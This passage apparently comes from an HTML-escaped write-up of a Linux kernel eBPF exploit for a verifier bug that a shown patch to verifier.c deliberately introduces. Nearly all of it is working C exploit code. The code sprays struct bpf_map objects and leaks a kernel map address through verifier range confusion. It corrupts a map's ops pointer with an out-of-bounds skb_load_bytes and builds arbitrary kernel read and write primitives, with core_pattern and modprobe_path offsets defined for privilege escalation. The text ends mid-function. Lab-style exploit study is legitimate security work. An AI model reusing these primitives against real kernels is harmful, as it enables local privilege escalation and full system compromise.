      BPF_ALU64_IMM(BPF_ADD, BPF_REG_2,
                    1),  // r2 = (val=0xfffffffe00000001, mask=0)

      // When r1|=r2, r1 = (val=r1.val|r2.val, mask=(r1.mask|r2.mask) &amp;amp;
      // (~this.val)).
      // And if r1.mask == (u64)0, __mark_reg_known -&amp;gt;
      // ___mark_reg_known is called.
      // That call sets r1&amp;#39;s min and max to the known immediate.
      // Because (~0xffffffff00000001) &amp;amp; 0xffffffff00000000 == 0 and
      // (~0xfffffffe00000001) &amp;amp; 0xffffffff00000000 == 0x100000000, we must use
      // BPF_MOV64_IMM(BPF_REG_2, 0x00000000fffffffe).
      BPF_ALU64_REG(BPF_OR, BPF_REG_1,
                    BPF_REG_2),  // r1 = (s32_min=1, s32_max=0, u32_min=1,
                                 // u32_max=0).

      BPF_MOV32_REG(BPF_REG_1, BPF_REG_1),           // r1(w1) = w1(r1)
      BPF_MOV64_REG(BPF_REG_0, BPF_REG_6),           // r0 = r6
      BPF_ALU64_REG(BPF_ADD, BPF_REG_0, BPF_REG_1),  // r0 += r1
      BPF_STX_MEM(BPF_DW, BPF_REG_FP, BPF_REG_0,
                  -0x10),  // *(u64*)(fp-0x10) = r0
      // arg1(mapfd)
      BPF_LD_MAP_FD(BPF_REG_ARG1, mapfd),
      // arg2(&amp;amp;key) = fp-0x08
      BPF_ST_MEM(BPF_DW, BPF_REG_FP, -0x08, 0),     // *(u64*)(fp-0x08) = 0
      BPF_MOV64_REG(BPF_REG_ARG2, BPF_REG_FP),      // arg2 = fp
      BPF_ALU64_IMM(BPF_ADD, BPF_REG_ARG2, -0x08),  // arg2 = arg2(fp)-0x08
      // arg3(&amp;amp;val) = fp-0x10
      BPF_MOV64_REG(BPF_REG_ARG3, BPF_REG_FP),      // arg3 = fp
      BPF_ALU64_IMM(BPF_ADD, BPF_REG_ARG3, -0x10),  // arg3 = arg3(fp)-0x10
      // arg4(flags)
      BPF_MOV64_IMM(BPF_REG_ARG4, 0),  // arg4 = 0
      // map_update_elem(mapfd, &amp;amp;key, &amp;amp;val, 0)
      BPF_EMIT_CALL(BPF_FUNC_map_update_elem),

      BPF_MOV64_IMM(BPF_REG_0, 0),
      BPF_EXIT_INSN(),
  };

  union bpf_attr prog_attr = {
      .prog_type = BPF_PROG_TYPE_SOCKET_FILTER,
      .insn_cnt = sizeof(insns) / sizeof(insns[0]),
      .insns = (uint64_t)insns,
      .license = (uint64_t)&amp;#34;GPL v2&amp;#34;,
      .log_level = 2,
      .log_size = sizeof(verifier_log),
      .log_buf = (uint64_t)verifier_log,
  };

  int progfd = bpf(BPF_PROG_LOAD, &amp;amp;prog_attr);
  if (progfd &amp;lt; 0) {
    puts(&amp;#34;============[failed reason]============&amp;#34;);
    printf(&amp;#34;%s\n&amp;#34;, verifier_log);
    fatal(&amp;#34;bpf(BPF_PROG_LOAD)&amp;#34;);
  }

  int socks[2];
  if (socketpair(AF_UNIX, SOCK_DGRAM, 0, socks)) {
    fatal(&amp;#34;socketpair&amp;#34;);
  }
  if (setsockopt(socks[0], SOL_SOCKET, SO_ATTACH_BPF, &amp;amp;progfd, sizeof(int))) {
    fatal(&amp;#34;setsockopt&amp;#34;);
  }

  write(socks[1], &amp;#34;Hello&amp;#34;, 5);

  bpf_map_lookup(mapfd, 0, &amp;amp;val);

  close(socks[0]);
  close(socks[1]);
  close(progfd);

  return val - 1 - 0x110;
}

uint64_t bpf_map_addr = 0;

int main() {
  srand(time(NULL));
  char verifier_log[0x10000];

  mapfd = bpf_map_create(sizeof(uint64_t), 1);

  bpf_map_addr = leak_bpf_map_addr();
  printf(&amp;#34;[+] bpf_map_addr: 0x%016lx, &amp;amp;bpf_map_elem = 0x%016lx\n&amp;#34;, bpf_map_addr,
         bpf_map_addr + 0x110);

  return 0;
}&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;


&lt;h4 id=&#34;leak-addr-of-struct-bpf_map-using-oob-read--heap-spray&#34;&gt;Leak addr of &lt;code&gt;struct bpf_map&lt;/code&gt; using oob read &amp;amp; heap spray&lt;/h4&gt;



  &lt;div class=&#34;collapsable-code&#34;&gt;
    &lt;input id=&#34;376148295&#34; type=&#34;checkbox&#34; checked /&gt;
    &lt;label for=&#34;376148295&#34;&gt;
      &lt;span class=&#34;collapsable-code__language&#34;&gt;c&lt;/span&gt;
      &lt;span class=&#34;collapsable-code__title&#34;&gt;leak_bpf_map_using_oob_read.c&lt;/span&gt;
      &lt;span class=&#34;collapsable-code__toggle&#34; data-label-expand=&#34;Show&#34; data-label-collapse=&#34;Hide&#34;&gt;&lt;/span&gt;
    &lt;/label&gt;
    &lt;pre class=&#34;language-c&#34; &gt;
      &lt;code&gt;// Patch location:
//    https://elixir.bootlin.com/linux/v5.18.14/source/kernel/bpf/verifier.c#L7957
// Diff:
//    7957c7957,7958
//    &amp;lt;               __mark_reg32_known(dst_reg, var32_off.value);
//    ---
//    &amp;gt;               // `scalar_min_max_or` will handle the case
//    &amp;gt;               //__mark_reg32_known(dst_reg, var32_off.value);

#include &amp;lt;asm-generic/socket.h&amp;gt;
#include &amp;lt;fcntl.h&amp;gt;
#include &amp;lt;linux/bpf.h&amp;gt;
#include &amp;lt;stdint.h&amp;gt;
#include &amp;lt;stdio.h&amp;gt;
#include &amp;lt;stdlib.h&amp;gt;
#include &amp;lt;string.h&amp;gt;
#include &amp;lt;sys/socket.h&amp;gt;
#include &amp;lt;sys/syscall.h&amp;gt;
#include &amp;lt;sys/types.h&amp;gt;
#include &amp;lt;time.h&amp;gt;
#include &amp;lt;unistd.h&amp;gt;

#include &amp;#34;bpf_insn.h&amp;#34;

#define KERNEL_BASE 0xffffffff81000000
#define BPF_MAP_OPS_OFFSET (0xffffffff81c124a0 - KERNEL_BASE)
#define BPF_MAP_OPS_LOOKUP_IDX 12
#define BPF_MAP_OPS_LOOKUP_ELEM_OFFSET \
  (BPF_MAP_OPS_OFFSET + BPF_MAP_OPS_LOOKUP_IDX * 8)
#define BPF_MAP_OPS_UPDATE_ELEM_IDX 13
#define BPF_MAP_OPS_UPDATE_ELEM_OFFSET \
  (BPF_MAP_OPS_OFFSET + BPF_MAP_OPS_UPDATE_ELEM_IDX * 8)
#define CORE_PATTERN_OFFSET (0xffffffff81eb25e0 - KERNEL_BASE)
#define MODBPROB_OFFSET (0xffffffff81e37fe0 - KERNEL_BASE)

void get_enter_to_continue(const char* msg) {
  puts(msg);
  getchar();
}

void fatal(const char* msg) {
  perror(msg);
  // get_enter_to_continue(&amp;#34;Press enter to exit...&amp;#34;);
  exit(-1);
}

int bpf(int cmd, union bpf_attr* attrs) {
  return syscall(__NR_bpf, cmd, attrs, sizeof(*attrs));
}

int bpf_map_create(int val_size, int max_entries) {
  union bpf_attr attr = {
      .map_type = BPF_MAP_TYPE_ARRAY,
      .key_size = sizeof(int),
      .value_size = val_size,
      .max_entries = max_entries,
  };

  int map_fd = bpf(BPF_MAP_CREATE, &amp;amp;attr);
  if (map_fd &amp;lt; 0) {
    fatal(&amp;#34;bpf(BPF_MAP_CREATE)&amp;#34;);
  }

  return map_fd;
}
int bpf_map_update(int map_fd, int key, void* pval) {
  union bpf_attr attr = {
      .map_fd = map_fd,
      .key = (uint64_t)&amp;amp;key,
      .value = (uint64_t)pval,
      .flags = BPF_ANY,
  };

  int res = bpf(BPF_MAP_UPDATE_ELEM, &amp;amp;attr);
  if (res &amp;lt; 0) {
    fatal(&amp;#34;bpf(BPF_MAP_UPDATE_ELEM)&amp;#34;);
  }

  return res;
}
int bpf_map_lookup(int map_fd, int key, void* pval) {
  union bpf_attr attr = {
      .map_fd = map_fd,
      .key = (uint64_t)&amp;amp;key,
      .value = (uint64_t)pval,
      .flags = BPF_ANY,
  };

  return bpf(BPF_MAP_LOOKUP_ELEM, &amp;amp;attr);
}

int mapfd;
int map_spray_fd[0x100];
void make_corrupted_map() {
  uint64_t map_val = 1;

  puts(&amp;#34;[*] Spray struct bpf_map...&amp;#34;);
  for (int i = 0; i &amp;lt; sizeof(map_spray_fd) / 4; i++) {
    map_spray_fd[i] = bpf_map_create(sizeof(uint64_t), 1);
    bpf_map_update(map_spray_fd[i], 0, &amp;amp;map_val);
  }
  mapfd = map_spray_fd[0x81];

  char verifier_log[0x10000];

  bpf_map_update(mapfd, 0, &amp;amp;map_val);

  struct bpf_insn insns[] = {
      // BPF_REG_ARG1 == struct __sk_buff
      BPF_STX_MEM(BPF_DW, BPF_REG_FP, BPF_REG_ARG1,
                  -0x08),  // *(u64*)(fp-0x08) = skb

      // arg1(mapfd)
      BPF_LD_MAP_FD(BPF_REG_ARG1, mapfd),
      // arg2(key) = fp-0x10
      BPF_ST_MEM(BPF_DW, BPF_REG_FP, -0x10, 0),
      BPF_MOV64_REG(BPF_REG_ARG2, BPF_REG_FP),
      BPF_ALU64_IMM(BPF_ADD, BPF_REG_ARG2, -0x10),
      // call map_lookup_elem(mapfd, &amp;amp;key(-&amp;gt;0))
      BPF_EMIT_CALL(BPF_FUNC_map_lookup_elem),
      BPF_JMP_IMM(BPF_JNE, BPF_REG_0, 0, 1),
      BPF_EXIT_INSN(),

      BPF_MOV64_REG(BPF_REG_6, BPF_REG_0),  // r6 = r0 == map_elem
      BPF_LDX_MEM(BPF_DW, BPF_REG_7, BPF_REG_0,
                  0),  // r7 = [r0] == (val=1, mask=0xffffffffffffffff)
      BPF_MOV64_REG(BPF_REG_1, BPF_REG_7),  // r1 = r7
      BPF_ALU64_IMM(BPF_RSH, BPF_REG_1,
                    32),  // r1 = (val=0, mask=0x00000000ffffffff)
      BPF_ALU64_IMM(BPF_LSH, BPF_REG_1,
                    32),  // r1 = (val=0, mask=0xffffffff00000000)

      BPF_MOV64_IMM(BPF_REG_2, 0x00000000fffffffe),  // r2 = 0x00000000fffffffe
      BPF_ALU64_IMM(BPF_LSH, BPF_REG_2,
                    32),  // r2 = (val=0xfffffffe00000000, mask=0)
      BPF_ALU64_IMM(BPF_ADD, BPF_REG_2,
                    1),  // r2 = (val=0xfffffffe00000001, mask=0)

      // When r1|=r2, r1 = (val=r1.val|r2.val, mask=(r1.mask|r2.mask) &amp;amp;
      // (~this.val)).
      // And if r1.mask == (u64)0, __mark_reg_known -&amp;gt;
      // ___mark_reg_known is called.
      // That call sets r1&amp;#39;s min and max to the known immediate.
      // Because (~0xffffffff00000001) &amp;amp; 0xffffffff00000000 == 0 and
      // (~0xfffffffe00000001) &amp;amp; 0xffffffff00000000 == 0x100000000, we must use
      // BPF_MOV64_IMM(BPF_REG_2, 0x00000000fffffffe).
      BPF_ALU64_REG(BPF_OR, BPF_REG_1,
                    BPF_REG_2),  // r1 = (s32_min=1, s32_max=0, u32_min=1,
                                 // u32_max=0).
      BPF_MOV32_REG(BPF_REG_1, BPF_REG_1),  // r1(w1) = (s32_min=1, s32_max=0,
                                            // u32_min=1, u32_max=0).

      BPF_MOV64_REG(
          BPF_REG_2,
          BPF_REG_7),  // r2 = r7 == [r0] == (val=1, mask=0xffffffffffffffff)
      BPF_ALU64_IMM(BPF_AND, BPF_REG_2,
                    0x1),  // r2 = (val=1, mask=0x1)
      BPF_ALU64_REG(BPF_ADD, BPF_REG_1,
                    BPF_REG_2),  // r1 = r1 + r2 == (actual_val = 2; s32_min=1,
                                 // s32_max=1, u32_min=1, u32_max=1) ==
                                 // (actual_val=2; val=1, mask=0)
      BPF_ALU64_IMM(BPF_ADD, BPF_REG_1,
                    -1),  // r1 = r1 + -1 == (actual_val=1; val=0, mask=0)
      BPF_MOV64_REG(BPF_REG_8,
                    BPF_REG_1),  // r8 = r1 == (actual_val=1; val=0, mask=0)

      // arg1(skb)
      BPF_LDX_MEM(BPF_DW, BPF_REG_ARG1, BPF_REG_FP, -0x08),
      // arg2(offset)
      BPF_MOV64_IMM(BPF_REG_ARG2, 0),
      // arg3(to) = map_elem
      BPF_MOV64_REG(BPF_REG_ARG3, BPF_REG_6),  // arg3 = r6 == map_elem
      // arg4(len)
      BPF_MOV64_REG(BPF_REG_ARG4,
                    BPF_REG_8),  // arg4 = r8 == (actual_val=1; val=0, mask=0)
      BPF_ALU64_IMM(BPF_MUL, BPF_REG_ARG4,
                    0xf1 - 1),  // arg4 = (0xf1-1) * arg4 == (actual_val=0xf1-1;
                                // val=0, mask=0)
      BPF_ALU64_IMM(
          BPF_ADD, BPF_REG_ARG4,
          1),  // arg4 = arg4 + 1 == (actual_val=0xf1; val=0x1, mask=0)
      // skb_load_bytes(skb, 0, fp-0x20, (actual_val=0xf1; val=0x1, mask=0))
      BPF_EMIT_CALL(BPF_FUNC_skb_load_bytes),  // fp-0x18 = addr

      BPF_MOV64_IMM(BPF_REG_0, 0),
      BPF_EXIT_INSN(),
  };

  union bpf_attr prog_attr = {
      .prog_type = BPF_PROG_TYPE_SOCKET_FILTER,
      .insn_cnt = sizeof(insns) / sizeof(insns[0]),
      .insns = (uint64_t)insns,
      .license = (uint64_t)&amp;#34;GPL v2&amp;#34;,
      .log_level = 2,
      .log_size = sizeof(verifier_log),
      .log_buf = (uint64_t)verifier_log,
  };

  int progfd = bpf(BPF_PROG_LOAD, &amp;amp;prog_attr);
  if (progfd &amp;lt; 0) {
    puts(&amp;#34;============[failed reason]============&amp;#34;);
    printf(&amp;#34;%s\n&amp;#34;, verifier_log);
    fatal(&amp;#34;bpf(BPF_PROG_LOAD)&amp;#34;);
  }

  int socks[2];
  if (socketpair(AF_UNIX, SOCK_DGRAM, 0, socks)) {
    fatal(&amp;#34;socketpair&amp;#34;);
  }
  if (setsockopt(socks[0], SOL_SOCKET, SO_ATTACH_BPF, &amp;amp;progfd, sizeof(int))) {
    fatal(&amp;#34;setsockopt&amp;#34;);
  }

  char buf[0x100] = {
      0,
  };
  // Overwrite low byte of bpf_map-&amp;gt;ops
  // (https://elixir.bootlin.com/linux/v5.18.14/source/include/linux/bpf.h#L63)
  memset(buf, &amp;#39;a&amp;#39;, 0xf0);
  buf[0xf0] = 0xa0 - 8;
  write(socks[1], buf, sizeof(buf));

  close(socks[0]);
  close(socks[1]);
  close(progfd);
}

int corrupted_map_fd;
uint64_t bpf_map_addr;
void find_corrupted_map_and_leak_bpf_map_addr() {
  char verifier_log[0x10000];

  for (int i = 0; i &amp;lt; sizeof(map_spray_fd) / 4; ++i) {
    int cur_map_fd = map_spray_fd[i];
    if (cur_map_fd == mapfd) {
      continue;
    }

    // uint64_t map_val = 0;
    // int ret = bpf_map_update(cur_map_fd, 0, &amp;amp;map_val);
    // printf(&amp;#34;ret: 0x%x, val: 0x%lx\n&amp;#34;, ret, map_val);

    struct bpf_insn insns[] = {
        // BPF_REG_ARG1 == struct __sk_buff
        BPF_STX_MEM(BPF_DW, BPF_REG_FP, BPF_REG_ARG1,
                    -0x08),  // *(u64*)(fp-0x08) = skb

        // arg1(mapfd)
        BPF_LD_MAP_FD(BPF_REG_ARG1, cur_map_fd),
        // arg2(&amp;amp;key) = fp-0x10 &amp;lt;- 0
        BPF_ST_MEM(BPF_DW, BPF_REG_FP, -0x10, 0),
        BPF_MOV64_REG(BPF_REG_ARG2, BPF_REG_FP),
        BPF_ALU64_IMM(BPF_ADD, BPF_REG_ARG2, -0x10),
        // arg3(&amp;amp;val) = fp-0x10 &amp;lt;- 0
        BPF_MOV64_REG(BPF_REG_ARG3, BPF_REG_ARG2),
        // arg4(flags)
        BPF_MOV64_IMM(BPF_REG_ARG4, 0),
        // map_update_elem(mapfd, fp-0x10, fp-0x10, 0) or map_lookup_elem(mapfd,
        // fp-0x10) if corrupted
        BPF_EMIT_CALL(BPF_FUNC_map_update_elem),
        BPF_STX_MEM(BPF_DW, BPF_REG_FP, BPF_REG_0, -0x18),

        // arg1(mapfd)
        BPF_LD_MAP_FD(BPF_REG_ARG1, mapfd),
        // arg2(&amp;amp;key) = fp-0x10 &amp;lt;- 0
        BPF_ST_MEM(BPF_DW, BPF_REG_FP, -0x10, 0),
        BPF_MOV64_REG(BPF_REG_ARG2, BPF_REG_FP),
        BPF_ALU64_IMM(BPF_ADD, BPF_REG_ARG2, -0x10),
        // arg3(&amp;amp;val) = fp-0x18 &amp;lt;- return value of map_update_elem or
        // map_lookup_elem.
        BPF_MOV64_REG(BPF_REG_ARG3, BPF_REG_FP),
        BPF_ALU64_IMM(BPF_ADD, BPF_REG_ARG3, -0x18),
        // arg4(flags)
        BPF_MOV64_IMM(BPF_REG_ARG4, 0),
        // map_update_elem(mapfd, fp-0x10, fp-0x18, 0)
        BPF_EMIT_CALL(BPF_FUNC_map_update_elem),

        BPF_MOV64_IMM(BPF_REG_0, 0),
        BPF_EXIT_INSN(),
    };

    union bpf_attr prog_attr = {
        .prog_type = BPF_PROG_TYPE_SOCKET_FILTER,
        .insn_cnt = sizeof(insns) / sizeof(insns[0]),
        .insns = (uint64_t)insns,
        .license = (uint64_t)&amp;#34;GPL v2&amp;#34;,
        .log_level = 2,
        .log_size = sizeof(verifier_log),
        .log_buf = (uint64_t)verifier_log,
    };

    int progfd = bpf(BPF_PROG_LOAD, &amp;amp;prog_attr);
    if (progfd &amp;lt; 0) {
      puts(&amp;#34;============[failed reason]============&amp;#34;);
      printf(&amp;#34;%s\n&amp;#34;, verifier_log);
      fatal(&amp;#34;bpf(BPF_PROG_LOAD)&amp;#34;);
    }

    int socks[2];
    if (socketpair(AF_UNIX, SOCK_DGRAM, 0, socks)) {
      fatal(&amp;#34;socketpair&amp;#34;);
    }
    if (setsockopt(socks[0], SOL_SOCKET, SO_ATTACH_BPF, &amp;amp;progfd, sizeof(int))) {
      fatal(&amp;#34;setsockopt&amp;#34;);
    }

    write(socks[1], &amp;#34;Hello&amp;#34;, 5);

    uint64_t val;
    bpf_map_lookup(mapfd, 0, &amp;amp;val);

    close(socks[0]);
    close(socks[1]);
    close(progfd);

    if (val != 0) {
      bpf_map_addr = val - 0x110;
      corrupted_map_fd = cur_map_fd;
      continue;
    }

    close(cur_map_fd);
  }
}

uint64_t aaw64(uint64_t addr, uint64_t val) {
  char verifier_log[0x10000];

  uint64_t map_val = 1;
  bpf_map_update(mapfd, 0, &amp;amp;map_val);

  struct bpf_insn insns[] = {
      // BPF_REG_ARG1 == struct __sk_buff
      BPF_STX_MEM(BPF_DW, BPF_REG_FP, BPF_REG_ARG1,
                  -0x08),  // *(u64*)(fp-0x08) = skb

      // arg1(mapfd)
      BPF_LD_MAP_FD(BPF_REG_ARG1, mapfd),
      // arg2(key) = fp-0x10
      BPF_ST_MEM(BPF_DW, BPF_REG_FP, -0x10, 0),
      BPF_MOV64_REG(BPF_REG_ARG2, BPF_REG_FP),
      BPF_ALU64_IMM(BPF_ADD, BPF_REG_ARG2, -0x10),
      // call map_lookup_elem(mapfd, &amp;amp;key(-&amp;gt;0))
      BPF_EMIT_CALL(BPF_FUNC_map_lookup_elem),
      BPF_JMP_IMM(BPF_JNE, BPF_REG_0, 0, 1),
      BPF_EXIT_INSN(),

      BPF_MOV64_REG(BPF_REG_6, BPF_REG_0),  // r6 = r0 == map_elem
      BPF_LDX_MEM(BPF_DW, BPF_REG_7, BPF_REG_0,
                  0),  // r7 = [r0] == (val=1, mask=0xffffffffffffffff)
      BPF_MOV64_REG(BPF_REG_1, BPF_REG_7),  // r1 = r7
      BPF_ALU64_IMM(BPF_RSH, BPF_REG_1,
                    32),  // r1 = (val=0, mask=0x00000000ffffffff)
      BPF_ALU64_IMM(BPF_LSH, BPF_REG_1,
                    32),  // r1 = (val=0, mask=0xffffffff00000000)

      BPF_MOV64_IMM(BPF_REG_2, 0x00000000fffffffe),  // r2 = 0x00000000fffffffe
      BPF_ALU64_IMM(BPF_LSH, BPF_REG_2,
                    32),  // r2 = (val=0xfffffffe00000000, mask=0)
      BPF_ALU64_IMM(BPF_ADD, BPF_REG_2,
                    1),  // r2 = (val=0xfffffffe00000001, mask=0)

      // When r1|=r2, r1 = (val=r1.val|r2.val, mask=(r1.mask|r2.mask) &amp;amp;
      // (~this.val)).
      // And if r1.mask == (u64)0, __mark_reg_known -&amp;gt;
      // ___mark_reg_known is called.
      // That call sets r1&amp;#39;s min and max to the known immediate.
      // Because (~0xffffffff00000001) &amp;amp; 0xffffffff00000000 == 0 and
      // (~0xfffffffe00000001) &amp;amp; 0xffffffff00000000 == 0x100000000, we must use
      // BPF_MOV64_IMM(BPF_REG_2, 0x00000000fffffffe).
      BPF_ALU64_REG(BPF_OR, BPF_REG_1,
                    BPF_REG_2),  // r1 = (s32_min=1, s32_max=0, u32_min=1,
                                 // u32_max=0).
      BPF_MOV32_REG(BPF_REG_1, BPF_REG_1),  // r1(w1) = (s32_min=1, s32_max=0,
                                            // u32_min=1, u32_max=0).

      BPF_MOV64_REG(
          BPF_REG_2,
          BPF_REG_7),  // r2 = r7 == [r0] == (val=1, mask=0xffffffffffffffff)
      BPF_ALU64_IMM(BPF_AND, BPF_REG_2,
                    0x1),  // r2 = (val=1, mask=0x1)
      BPF_ALU64_REG(BPF_ADD, BPF_REG_1,
                    BPF_REG_2),  // r1 = r1 + r2 == (actual_val = 2; s32_min=1,
                                 // s32_max=1, u32_min=1, u32_max=1) ==
                                 // (actual_val=2; val=1, mask=0)
      BPF_ALU64_IMM(BPF_ADD, BPF_REG_1,
                    -1),  // r1 = r1 + -1 == (actual_val=1; val=0, mask=0)
      BPF_MOV64_REG(BPF_REG_8,
                    BPF_REG_1),  // r8 = r1 == (actual_val=1; val=0, mask=0)

      // arg1(skb)
      BPF_LDX_MEM(BPF_DW, BPF_REG_ARG1, BPF_REG_FP, -0x08),
      // arg2(offset)
      BPF_MOV64_IMM(BPF_REG_ARG2, 0),
      // arg3(to) = fp-0x20
      BPF_MOV64_REG(BPF_REG_ARG3, BPF_REG_FP),      // arg3 = fp
      BPF_ALU64_IMM(BPF_ADD, BPF_REG_ARG3, -0x20),  // arg3 = arg3(fp)-0x20
      BPF_STX_MEM(BPF_DW, BPF_REG_FP, BPF_REG_ARG3,
                  -0x18),  // *(u64*)(fp-0x18) = arg3 == fp-0x20
      // arg4(len)
      BPF_MOV64_REG(BPF_REG_ARG4,
                    BPF_REG_8),  // arg4 = r8 == (actual_val=1; val=0, mask=0)
      BPF_ALU64_IMM(
          BPF_MUL, BPF_REG_ARG4,
          0x10 - 1),  // arg4 = 0x0f * arg4 == (actual_val=0x0f; val=0, mask=0)
      BPF_ALU64_IMM(
          BPF_ADD, BPF_REG_ARG4,
          1),  // arg4 = arg4 + 1 == (actual_val=0x10; val=0x1, mask=0)
      // skb_load_bytes(skb, 0, fp-0x20, (actual_val=0x10; val=0x1, mask=0))
      BPF_EMIT_CALL(BPF_FUNC_skb_load_bytes),  // fp-0x18 = addr

      // arg1(skb)
      BPF_LDX_MEM(BPF_DW, BPF_REG_ARG1, BPF_REG_FP, -0x08),
      // arg2(offset)
      BPF_MOV64_IMM(BPF_REG_ARG2, 0x10),
      // arg3(to) = addr
      BPF_LDX_MEM(BPF_DW, BPF_REG_ARG3, BPF_REG_FP,
                  -0x18),  // arg3 = fp-0x18 == addr
      // arg4(len)
      BPF_MOV64_IMM(BPF_REG_ARG4, 8),
      // skb_load_bytes(skb, 0x10, addr, 8)
      BPF_EMIT_CALL(BPF_FUNC_skb_load_bytes),

      BPF_MOV64_IMM(BPF_REG_0, 0),
      BPF_EXIT_INSN(),
  };

  union bpf_attr prog_attr = {
      .prog_type = BPF_PROG_TYPE_SOCKET_FILTER,
      .insn_cnt = sizeof(insns) / sizeof(insns[0]),
      .insns = (uint64_t)insns,
      .license = (uint64_t)&amp;#34;GPL v2&amp;#34;,
      .log_level = 2,
      .log_size = sizeof(verifier_log),
      .log_buf = (uint64_t)verifier_log,
  };

  int progfd = bpf(BPF_PROG_LOAD, &amp;amp;prog_attr);
  if (progfd &amp;lt; 0) {
    puts(&amp;#34;============[failed reason]============&amp;#34;);
    printf(&amp;#34;%s\n&amp;#34;, verifier_log);
    fatal(&amp;#34;bpf(BPF_PROG_LOAD)&amp;#34;);
  }

  int socks[2];
  if (socketpair(AF_UNIX, SOCK_DGRAM, 0, socks)) {
    fatal(&amp;#34;socketpair&amp;#34;);
  }
  if (setsockopt(socks[0], SOL_SOCKET, SO_ATTACH_BPF, &amp;amp;progfd, sizeof(int))) {
    fatal(&amp;#34;setsockopt&amp;#34;);
  }

  uint64_t buf[] = {0xdeadbeefcafebebe, addr, val};
  write(socks[1], buf, sizeof(buf));

  close(socks[0]);
  close(socks[1]);
  close(progfd);

  return buf[0];
}
uint64_t aar64(uint64_t addr) {
  char verifier_log[0x10000];

  uint64_t map_val = 1;
  bpf_map_update(mapfd, 0, &amp;amp;map_val);

  struct bpf_insn insns[] = {
      // BPF_REG_ARG1 == struct __sk_buff
      BPF_STX_MEM(BPF_DW, BPF_REG_FP, BPF_REG_ARG1,
                  -0x08),  // *(u64*)(fp-0x08) = skb

      // arg1(mapfd)
      BPF_LD_MAP_FD(BPF_REG_ARG1, mapfd),
      // arg2(key) = fp-0x10
      BPF_ST_MEM(BPF_DW, BPF_REG_FP, -0x10, 0),
      BPF_MOV64_REG(BPF_REG_ARG2, BPF_REG_FP),
      BPF_ALU64_IMM(BPF_ADD, BPF_REG_ARG2, -0x10),
      // call map_lookup_elem(mapfd, &amp;amp;key(-&amp;gt;0))
      BPF_EMIT_CALL(BPF_FUNC_map_lookup_elem),
      BPF_JMP_IMM(BPF_JNE, BPF_REG_0, 0, 1),
      BPF_EXIT_INSN(),

      BPF_MOV64_REG(BPF_REG_6, BPF_REG_0),  // r6 = r0 == map_elem
      BPF_LDX_MEM(BPF_DW, BPF_REG_7, BPF_REG_0,
                  0),  // r7 = [r0] == (val=1, mask=0xffffffffffffffff)
      BPF_MOV64_REG(BPF_REG_1, BPF_REG_7),  // r1 = r7
      BPF_ALU64_IMM(BPF_RSH, BPF_REG_1,
                    32),  // r1 = (val=0, mask=0x00000000ffffffff)
      BPF_ALU64_IMM(BPF_LSH, BPF_REG_1,
                    32),  // r1 = (val=0, mask=0xffffffff00000000)

      BPF_MOV64_IMM(BPF_REG_2, 0x00000000fffffffe),  // r2 = 0x00000000fffffffe
      BPF_ALU64_IMM(BPF_LSH, BPF_REG_2,
                    32),  // r2 = (val=0xfffffffe00000000, mask=0)
      BPF_ALU64_IMM(BPF_ADD, BPF_REG_2,
                    1),  // r2 = (val=0xfffffffe00000001, mask=0)

      // When r1|=r2, r1 = (val=r1.val|r2.val, mask=(r1.mask|r2.mask) &amp;amp;
      // (~this.val)).
      // And if r1.mask == (u64)0, __mark_reg_known -&amp;gt;
      // ___mark_reg_known is called.
      // That call sets r1&amp;#39;s min and max to the known immediate.
      // Because (~0xffffffff00000001) &amp;amp; 0xffffffff00000000 == 0 and
      // (~0xfffffffe00000001) &amp;amp; 0xffffffff00000000 == 0x100000000, we must use
      // BPF_MOV64_IMM(BPF_REG_2, 0x00000000fffffffe).
      BPF_ALU64_REG(BPF_OR, BPF_REG_1,
                    BPF_REG_2),  // r1 = (s32_min=1, s32_max=0, u32_min=1,
                                 // u32_max=0).
      BPF_MOV32_REG(BPF_REG_1, BPF_REG_1),  // r1(w1) = (s32_min=1, s32_max=0,
                                            // u32_min=1, u32_max=0).

      BPF_MOV64_REG(
          BPF_REG_2,
          BPF_REG_7),  // r2 = r7 == [r0] == (val=1, mask=0xffffffffffffffff)
      BPF_ALU64_IMM(BPF_AND, BPF_REG_2,
                    0x1),  // r2 = (val=1, mask=0x1)
      BPF_ALU64_REG(BPF_ADD, BPF_REG_1,
                    BPF_REG_2),  // r1 = r1 + r2 == (actual_val = 2; s32_min=1,
                                 // s32_max=1, u32_min=1, u32_max=1) ==
                                 // (actual_val=2; val=1, mask=0)
      BPF_ALU64_IMM(BPF_ADD, BPF_REG_1,
                    -1),  // r1 = r1 + -1 == (actual_val=1; val=0, mask=0)
      BPF_MOV64_REG(BPF_REG_8,
                    BPF_REG_1),  // r8 = r1 == (actual_val=1; val=0, mask=0)

      // arg1(skb)
      BPF_LDX_MEM(BPF_DW, BPF_REG_ARG1, BPF_REG_FP, -0x08),
      // arg2(offset)
      BPF_MOV64_IMM(BPF_REG_ARG2, 0),
      // arg3(to) = fp-0x20
      BPF_MOV64_REG(BPF_REG_ARG3, BPF_REG_FP),      // arg3 = fp
      BPF_ALU64_IMM(BPF_ADD, BPF_REG_ARG3, -0x20),  // arg3 = arg3(fp)-0x20
      BPF_STX_MEM(BPF_DW, BPF_REG_FP, BPF_REG_6,
                  -0x18),  // *(u64*)(fp-0x18) = r6 == map_elem (overwritten by skb_load_bytes below)
      // arg4(len)
      BPF_MOV64_REG(BPF_REG_ARG4,
                    BPF_REG_8),  // arg4 = r8 == (actual_val=1; val=0, mask=0)
      BPF_ALU64_IMM(
          BPF_MUL, BPF_REG_ARG4,
          0x10 - 1),  // arg4 = 0x0f * arg4 == (actual_val=0x0f; val=0, mask=0)
      BPF_ALU64_IMM(
          BPF_ADD, BPF_REG_ARG4,
          1),  // arg4 = arg4 + 1 == (actual_val=0x10; val=0x1, mask=0)
      // skb_load_bytes(skb, 0, fp-0x20, (actual_val=0x10; val=0x1, mask=0))
      BPF_EMIT_CALL(BPF_FUNC_skb_load_bytes),  // fp-0x18 = addr

      // arg1(mapfd)
      BPF_LD_MAP_FD(BPF_REG_ARG1, mapfd),
      // arg2(&amp;amp;key)
      BPF_MOV64_REG(BPF_REG_ARG2, BPF_REG_FP),
      BPF_ALU64_IMM(BPF_ADD, BPF_REG_ARG2, -0x10),
      // arg3(&amp;amp;val)
      BPF_LDX_MEM(BPF_DW, BPF_REG_ARG3, BPF_REG_FP, -0x18),
      // arg4(flags)
      BPF_MOV64_IMM(BPF_REG_ARG4, 0),
      // map_update_elem(mapfd, &amp;amp;key, &amp;amp;val, 0)
      BPF_EMIT_CALL(BPF_FUNC_map_update_elem),

      BPF_MOV64_IMM(BPF_REG_0, 0),
